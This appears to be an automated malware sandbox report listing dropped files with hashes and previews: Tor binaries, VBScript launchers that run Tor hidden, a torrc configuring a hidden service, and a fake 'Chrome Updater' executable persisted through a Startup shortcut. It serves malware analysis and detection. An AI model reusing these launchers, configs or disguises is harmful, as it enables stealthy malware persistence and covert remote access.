Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3655740
Entropy (8bit):	6.4622987038409
Encrypted:	false
SSDEEP:	98304:gNuOztMCl6beK03dnwzje1UZecMioeWhuw6N7hpupY1CPwDv3uFfJUz5XlgDzCRK:AHaCl6beK03dnwzje1wecboeWhuZN7hq
MD5:	6D48D76A4D1C9B0FF49680349C4D28AE
SHA1:	1BB3666C16E11EFF8F9C3213B20629F02D6A66CB
SHA-256:	3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
SHA-512:	09A4FD7B37CF52F6A0C3BB0A7517E2D2439F4AF8E03130AED3296D7448585EA5E3C0892E1E1202F658EF2D083CE13C436779E202C39620A70A17B026705C65C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........rW.....!...#......&..B........... ....@k.........................`/......p8...@... .......................#.......%......0&......................@&.,.............................".....................D.%..............................text...x...........................`..`.data........ ....... ..............@.`..rdata..(Q...0...R...0..............@.`@.bss.....A....#.......................`..edata........#.......#.............@.0@.idata........%.......%.............@.0..CRT....,.....&.......%.............@.0..tls......... &.......%.............@.0..rsrc........0&.......%.............@.0..reloc..,....@&.......%.............@.0B/4...........0'.......&.............@.@B/19..........@'.......&.............@..B/31.....\V...P,..X....+.............@..B/45...........,.......+.............@..B/57.....\.....-.......,.............@.0B/70...........-.......,.

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent-2-1-7.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1144039
Entropy (8bit):	6.2640955652625285
Encrypted:	false
SSDEEP:	24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
MD5:	A3BF8E33948D94D490D4613441685EEE
SHA1:	75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
SHA-256:	91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
SHA-512:	C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#...........................h.................................B....@... ..........................Y......4............................P..X&..........................dj......................L................................text...............................`.P`.data...............................@.`..rdata..P...........................@.`@.bss..................................`..edata...Y.......Z...p..............@.0@.idata..4...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..X&...P...(..................@.0B/4..................................@.@B/19.....;".......$..................@..B/31......Y.......Z...4..............@..B/45.......... ......................@..B/57..................z..............@.0B/70.....(....0......................@..B/81.....H]...@...^......

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_core-2-1-7.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	975436
Entropy (8bit):	6.216593168771383
Encrypted:	false
SSDEEP:	24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
MD5:	686C6A9DA6767287BF2E2126574FAFEA
SHA1:	2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
SHA-256:	ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
SHA-512:	3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........-......!...#.J...................`....0n................................F.....@... .........................i<...0...............................`..............................$........................2..H............................text...TI.......J..................`.P`.data........`.......P..............@.`..rdata..<V...p...X...T..............@.`@.bss..................................`..edata..i<.......>..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/4..................................@.@B/19.................................@..B/31.....}W.......X...8..............@..B/45.....p...........................@..B/57..................z..............@.0B/70.......... ......................@..B/81......[...0...\......

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_extra-2-1-7.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	683256
Entropy (8bit):	6.173131714749706
Encrypted:	false
SSDEEP:	12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
MD5:	070F988B98E9717BBD5E870A4F8C1611
SHA1:	17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
SHA-256:	9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
SHA-512:	C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.$...................@.....d......................................@... .................................$...............................P...........................D~.......................................................text...$".......$..................`.P`.data...4....@.......*..............@.`..rdata..\A...P...B...,..............@.`@.bss.... .............................`..edata........... ...n..............@.0@.idata..$...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..P...........................@.0B/4......P....0......................@.@B/19.....0+...@...,..................@..B/31.....z?...p...@..................@..B/45..................0..............@..B/57.....t....`......................@.0B/70.................................@..B/81.....D...............

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libgcc_s_sjlj-1.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1095418
Entropy (8bit):	6.031576353424405
Encrypted:	false
SSDEEP:	12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
MD5:	BD40FF3D0CE8D338A1FE4501CD8E9A09
SHA1:	3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
SHA-256:	EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
SHA-512:	404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!...#.:...j...............P.....m.........................@............@... .................................................................d............................f......................................................text....8.......:..................`.P`.data...(....P.......@..............@.0..rdata.......`.......B..............@.`@.bss..................................0..edata...............T..............@.0@.idata...............`..............@.0..CRT....,............f..............@.0..tls.................h..............@.0..reloc..d............j..............@.0B/4......H............p..............@.@B/19.....t...........................@..B/31.....a............,..............@..B/45......g...p...h..................@..B/57.....\).......*...Z..............@.0B/70.................................@..B/81.....=....0..........

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssl-1_1.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1107348
Entropy (8bit):	6.190031039194072
Encrypted:	false
SSDEEP:	24576:JOscL0k1lOI5732OutG3c1RcJq09LrXfu1UYaP3KHl20tzVBm1X6yD50H4Ine3/p:0scn5COutG3cQJtu1UYaP3KHs0tzVBmP
MD5:	945D225539BECC01FBCA32E9FF6464F0
SHA1:	A614EB470DEFEAB01317A73380F44DB669100406
SHA-256:	C697434857A039BF27238C105BE0487A0C6C611DD36CB1587C3C6B3BF582718A
SHA-512:	409F8F1E6D683A3CBE7954BCE37013316DEE086CDBD7ECDA88ACB5D94031CFF6166A93B641875116327151823CCE747BCF254C0185E0770E2B74B7C5E067BC4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........I......!...#....."............... .....j.........................`.......K....@... .........................3@......\|>...0.......................@...C...........................M.......................................................text...............................`.P`.data....,... ......................@.`..rdata.......P.......>..............@.`@.bss....X....p........................`..edata..3@.......B...Z..............@.0@.idata..\|>.......@..................@.0..CRT....,...........................@.0..tls......... ......................@.0..rsrc........0......................@.0..reloc...C...@...D..................@.0B/4...................(..............@.@B/19.............. ...,..............@..B/31......7.......8...L..............@..B/45.................................@..B/57.................................@.0B/70.....................

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssp-0.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	252871
Entropy (8bit):	5.911389655551474
Encrypted:	false
SSDEEP:	6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
MD5:	B77328DA7CEAD5F4623748A70727860D
SHA1:	13B33722C55CCA14025B90060E3227DB57BF5327
SHA-256:	46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
SHA-512:	2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z.........!...#.....2...............0.....h.........................@......q.....@... ......................`..i....p...............................................................@.......................p...............................text...............................`.P`.data...$....0......."..............@.0..rdata..h....@.......$..............@.0@.bss....d....P........................0..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.................4..............@.0..reloc...............6..............@.0B/4...................8..............@.@B/19..................<..............@..B/31.................................@..B/45......'.......(...0..............@..B/57..................X..............@.0B/70..................`..............@..B/81..................d..

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libwinpthread-1.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	525113
Entropy (8bit):	6.099620174174238
Encrypted:	false
SSDEEP:	12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
MD5:	19D7CC4377F3C09D97C6DA06FBABC7DC
SHA1:	3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
SHA-256:	228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
SHA-512:	23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X..W......!...#.....6.....................d.................................)....@... ...................................... ..P....................0......................................................t...8............................text.............................. .P`.data...H...........................@.0..rdata..4...........................@.0@.bss..................................0..edata..............................@.0@.idata..............................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...P.... ......................@.0..reloc.......0......................@.0B/4...........@......................@.@B/19.....$....P......................@..B/31.....\|D...@...F..................@..B/45.................................@..B/57.....$0...0...2..................@.0B/70..........p..........

C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-bg.vbs

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.939646411880318
Encrypted:	false
SSDEEP:	3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsMPjaPOUC:j6NqEK2dnmR5+Rl5+RBseFUC
MD5:	C066AE688069850E35E30EBA9C0FB4CA
SHA1:	75901F0E3E8488523B901FC3F7A5F21ED307E0E5
SHA-256:	816D5F7CD7C8B6AC18BD37E018A78FE95E6EE3A70EA232431C450FB4447CBF4A
SHA-512:	1A2D40EA4D759B39DE82BD3BDCF86464CA8C31F2896BCC521ED4251FC7293949930EC43B06D1742B7B71CE0FAA8D78338D7557B41B6ADC2B895263A837E326F7
Malicious:	false
Reputation:	unknown
Preview:	Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),0..Set WshShell = Nothing

C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-gencert.exe

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1055744
Entropy (8bit):	6.430797346246855
Encrypted:	false
SSDEEP:	12288:U0msFd0wHnfgHtubcrJfeFDmh3CUrDVX:jOwHnfgHtuQr92mh3BV
MD5:	29E72F9FA2E399A00EB31A355289D082
SHA1:	0DB2462212F9B4ABBAD9B48B87248447C28EE2F2
SHA-256:	5C380138810D0CD5407095F22E6F515AFCCD3615F40D627774FFF59865251336
SHA-512:	028472E6D4BC4CBDB948A9366B900C3EB0D631142CD1601BD98945AF70B9C5ADE2033063051F88025C341351E26DA5628FB263BFC4F09CAFD861BFC7D1F6CB76
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..........................`.......$....@... .............................................................. ..4>...........................h..........................4............................text...............................`.P`.data...(...........................@.`..rdata..0N.......P...j..............@.`@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..4>... ...@..................@.0B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4229632
Entropy (8bit):	6.429803829212971
Encrypted:	false
SSDEEP:	98304:7zI+VNHtad8rAiCQDE+KOzG5En1QIonPrW29hKX:H1HtadtPQDEfEn1QIbM
MD5:	07244A2C002FFDF1986B454429EACE0B
SHA1:	D7CD121CAAC2F5989AA68A052F638F82D4566328
SHA-256:	E9522E6912A0124C0A8C9FF9BB3712B474971376A4EB4CA614BB1664A2B4ABCF
SHA-512:	4A09DB85202723A73703C5926921FEF60C3DDDAE21528A01936987306C5E7937463F94A2F4A922811DE1F76621DEF2A8A597A8B38A719DD24E6FF3D4E07492CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................0...@..^............0...@..........................@A.......A...@... ...............................>..5...........................@?.4............................B;.....................,.>.(............................text....0.......0.................`.P`.data........0.......0.............@.`..rdata.......`1......J1.............@.`@.bss.....]....>.......................`..idata...5....>..6...\>.............@.0..CRT....4.... ?.......>.............@.0..tls.........0?.......>.............@.0..reloc..4....@?.......>.............@.0B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor.vbs

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.939646411880318
Encrypted:	false
SSDEEP:	3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsjv20FaPOUC:j6NqEK2dnmR5+Rl5+RBsjv2KUC
MD5:	DF39E5BEB63BA0DC6A84E29591BFAAA8
SHA1:	63EFC259EB67D150FAD9699250E383B773144E36
SHA-256:	FA5B02AD4EF3C6C290883A3173E53C46B024F7928835B1B53916260B156EE602
SHA-512:	4C649E2AD35AD7119B124C8D5F78E9194E5DC4AE53DC0FFFE773A28C31C6145A1A7AD2D24B3ACE1368EF1165E7CECB701D14A873263F8DDBAEB478A345C743F7
Malicious:	false
Reputation:	unknown
Preview:	Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),1..Set WshShell = Nothing

C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	132
Entropy (8bit):	4.979194871191635
Encrypted:	false
SSDEEP:	3:V9cbKCj4I5xKpCBj3ZVcbKCj4I5xKpCbvtGIRzIWQnhNiFX:0R5+QncR5+SFHRE3hNiFX
MD5:	1EF93CDA02A0C4AD92978542D2BCCCA9
SHA1:	2147257895E77B7DB0E040118E3D025ECE791212
SHA-256:	422CDB7373F4A7A568FF9EE7147A0B0E608066A573CA6A7531D2BD1B40844811
SHA-512:	8554B4306CBD0960CBE6CF720A4EDCC50B6AF5FDE08E44160BFBC411F3C0BCFD239FAEF3C1EC913C24A286C01ED4EEB88C8D25B3B3781A7B9D7F4ED6FB92AF65
Malicious:	false
Reputation:	unknown
Preview:	GeoIPFile C:\Program Files (x86)\Tor\geoip..GeoIPv6File C:\Program Files (x86)\Tor\geoip6..SocksPort localhost:9050..#ExitNodes {us}

C:\Users\user\AppData\Local\ixas4a6gsv\tor\torrc.txt

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.00462515827375
Encrypted:	false
SSDEEP:	6:CMRlvAiIwkn23MEFFiqnTNu5Pwkn23MEFvOunTyMObnTMvv:CQlY8f8EFFiH5Yf8EFf
MD5:	ABAAA364E15538B9983B1E81B6F870C1
SHA1:	CC994E7DBC014DFB622291824FED1571731EB2B9
SHA-256:	1FC3D3751B23CEDFDE8F604BFA8B7B11CF700B684998CF221DC3A523DD1E55D0
SHA-512:	8C41C41CA3D9A4491E4260A83FF9FF2DCA48C96720F32EBABB83C9D585ADCD8D2C757C200FB6067A0FB91EDF3FD2B293EA4F9C79E730FDA0C30A705CF1EB73BE
Malicious:	false
Reputation:	unknown
Preview:	SOCKSPort 2635..ControlPort 2636..DataDirectory C:\Users\user\AppData\Local\ixas4a6gsv\tor\data..HiddenServiceDir C:\Users\user\AppData\Local\ixas4a6gsv\tor\host..HiddenServicePort 80 127.0.0.1:2634..HiddenServiceVersion 3..

C:\Users\user\AppData\Local\ixas4a6gsv\tor\zlib1.dll

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	124416
Entropy (8bit):	6.479923939252401
Encrypted:	false
SSDEEP:	3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
MD5:	6F98DA9E33CD6F3DD60950413D3638AC
SHA1:	E630BDF8CEBC165AA81464FF20C1D55272D05675
SHA-256:	219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
SHA-512:	2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...#.r.........................c.........................`.......3....@... .........................\|............@.......................P..............................d.......................@................................text...tp.......r..................`.P`.data...H............v..............@.0..rdata...O.......P...x..............@.`@.bss..................................`..edata..\|...........................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..rsrc........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\j0hny.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	83543
Entropy (8bit):	7.994832753977069
Encrypted:	true
SSDEEP:	1536:PI2a7yXhRVRl2JSBMj4v4hqvDqy1PPcCyKDcclDQBblzwyo/k9:g24GRV/74wLvBP+4ccMzwPk9
MD5:	475D0BFC89CD1ECC640F134EB9C52195
SHA1:	48EB99789097AAA9FED4CE3B571A115508A7FC31
SHA-256:	72E65C4A5637F678C8B480CAA8B9C864A213E3392FA468F86F4BD8B38253A2B1
SHA-512:	35F535D71FEA5604BA59A0F269688D86AEECBE3F5EC0D61883D6467D669A334F55886861A437B0B087459E6B3CAF910AFF1B281A98EC3760782DC99AB9B6250B
Malicious:	false
Reputation:	unknown
Preview:	PK........P!sW..N9...........The Cinoshi Project.txtmR...0....{.5...9.I...4i.....,.$,$.Hu..+R.....I...,$..k....p.].w..@8w.(.q.h.3.@.h6..Xf:FP.0.6...l.L....aDk.W.R...M.l...u.=vB........=N.=...D...K.R@2A..]....5?S..\.`w..J..k....gK.{..8.....z4F.v.Y....`.K.>.0l>.zK....^.m.....3.?..t..9.......x.h.....'H..$._;.kh#.8...(...{.....T..K..p.s..`..!....x&U..v..E.5<Me.....F.DlA.8w...+x......J....,.a..Q!.0kx.s.{......l....<y`......7...3".Y.]...:.%..p..+.........-(..k.\....iqL..(.IUY.zF...k...Fd.maA.....\.uQ..YZ......T....qK....i.6......./z...._cn........O.ZtJo~...kU."q~2..x.7..t..qV\|.K..^un?o.....B...PK.........>sW.-~.U...........Information.txtmR.R.@...+N:.1...V.F.......&..........pA.".g.@.$k..R...+..l__..w..>..+......<...l}.....Ayr....E=S.P.E...M.TRP......m...D../....s.Z.X..S....+%l) . {q].^_~..\|GY....n..J.zk..%...;K.{...&.-Duc....d....R...j....$I.u..E..@:..Y._..t..]..G...m\A...+..O-..$._..i#...o.(U.u{z....)..\&..J....T.6..<.....X..H"....?.....q..

C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	419840
Entropy (8bit):	5.287282390724775
Encrypted:	false
SSDEEP:	12288:YRz22kP289h1DKKo/fFERMWARF0LwpgpfNXUeZj1s7JuQd3pEcIxH7PYGwwTYrEq:Yp2Wb
MD5:	E2CD9DED5E36DF514FCDCC80134EEBDD
SHA1:	E3FFAADCEDA6B8FA27C701E160F2C832299F90D3
SHA-256:	1B24E390B7DCD52CFDFA2A1307631138F91539824F1526F0FE5A4A2273305926
SHA-512:	7EBEC6177A2FB2BCF282905F85065B232F96E9EE043247FCECFABD0FB26357C3944D31223DC5C0D93190AFF3A9EDE1EABD66D4C2D89EB0CC44288C7EEA62F717
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.A..........."...0..]...........\|... ........@.. ....................................`.................................X\|..J....................................\|..8............................................ ............... ..H............text....]... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..@.................\|......H...........t.......r...................................................Q..P~AeS....:'^.;.k...E..X.K... 0.U.vm...v...L%O......&5D..b...ZI%..gE...]..../u..L...F..k....._......mz.RY...-Xt!.I.i)...Du.j.yx.X>k'.q..O...... .f}.:.c.J...1..Q3`bS.E.dw.k........+.pHhX.E....l.R{...s.#rK.....WfU...(./.....{..7..0(..#.....j....\...+.y......Ni.e........4b....4.S...U....2...u...9@`.^q...n.Q>!.....=.>..M.F.T..q.]....o`P.....$..@C.g.w..B.......[8y...\|.G\|B..............2+.H

C:\Users\user\AppData\Roaming\Chrome Updater\ChromeLog

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:I:I
MD5:	336D5EBC5436534E61D16E63DDFCA327
SHA1:	3BC15C8AAE3E4124DD409035F32EA2FD6835EFC9
SHA-256:	3973E022E93220F9212C18D0D0C543AE7C309E46640DA93A4A0314DE999F5112
SHA-512:	7C0B0D99A6E4C33CDA0F6F63547F878F4DD9F486DFE5D0446CE004B1C0FF28F191FF86F5D5933D3614CCEEE6FBBDC17E658881D3A164DFA5D6F4C699B2126E3D
Malicious:	false
Reputation:	unknown
Preview:	-

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	944
Entropy (8bit):	3.044279749760013
Encrypted:	false
SSDEEP:	12:8gl00sXowAOcQ/tz0/CSLAsKqn1E3LegTCNfBT/v4t2YZ/elFlSJm:8DLDWLqqnCbeVpdqy
MD5:	F433E031146E06EFCCD30B244057126C
SHA1:	2C7B9F7E2ABD4DED9C40AF1A5E01CBF39C1CB57E
SHA-256:	001106066DA40B6122FDDD1DFBDAF9E49D68F427361F2ED646E74E6D2E5FB201
SHA-512:	FE1FCF0FD9D8FC64A113CF16A989CCDE5EA5D0191D23BB1220F7D5D079030F62811A60D518F5FCBCC2E367331BE6C4C830F80E6CB4413ADB7B02B667F4862131
Malicious:	false
Reputation:	unknown
Preview:	L..................F........................................................G....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....l.1...........Chrome Updater..N............................................C.h.r.o.m.e. .U.p.d.a.t.e.r.....`.2...........Chrome.exe..F............................................C.h.r.o.m.e...e.x.e.......(.....\.....\.....\.....\.....\.C.h.r.o.m.e. .U.p.d.a.t.e.r.\.C.h.r.o.m.e...e.x.e.............y.............>.e.L.:..er.=y...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\D9EC.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1057280
Entropy (8bit):	7.924938247150688
Encrypted:	false
SSDEEP:	24576:hIFFFdzxPNuJtdzWU6INU04XH7yTOp0ee8rhQpLN99BiWL2lE:hI9FxVuJtdCU6O+G6p0niYLN9xL
MD5:	2A42D97ACFD504A4E15577F165F63A40
SHA1:	27E02A04A4772B3500F16348D3A6C28B60E346C0
SHA-256:	3F26B871B1E556D19B67814D3A758316B655CD508BE014A2EEA2CF40E1371B94
SHA-512:	0212681E8E4A9725E6C338BB84506D7D8BC05B8895E633B17A67FEF93E604BA8A6282ACD77A33A65F8791F830D750841C540D81538BB5BBA4798462C2D481AC0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....We.........."...................... ....@...... .......................`............`..........................................................@............................................................................................... ..H............text...`.... ...................... ..`.rsrc........@......................@..@........................................H........-...................8...........................................0..........(t.....0../.........(....}.......}......\|......(...+..\|....(......0..7.........(....}.......}.......}......\|......(...+..\|....(......0..X........{......,>..;....(....o.......(....-?..%.}......}.....\|.......(...+......{......\|............%.}......(....(....(.......(....u.... .\|..(h...o....(..........(......(....u.... 0z..(h...(......(......(....(....(....o........(....->..%.}.......}.....\|.......(.

C:\Users\user\AppData\Roaming\WinUpdateLog

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.77753952436788
Encrypted:	false
SSDEEP:	3:jHLLpRzDCWdy6//NTABTW+QKRpXzo+LACZ1edWv:jBdry6XNklW+lDs082
MD5:	97EE0A5658A580607EB57834FF11AD77
SHA1:	5E61499177295BBE2165A1236F27287FA321DC71
SHA-256:	69E8C5B9759519CFDF31F701B52C2DC9A4A825EB1123A78E4F29F7F8C1273755
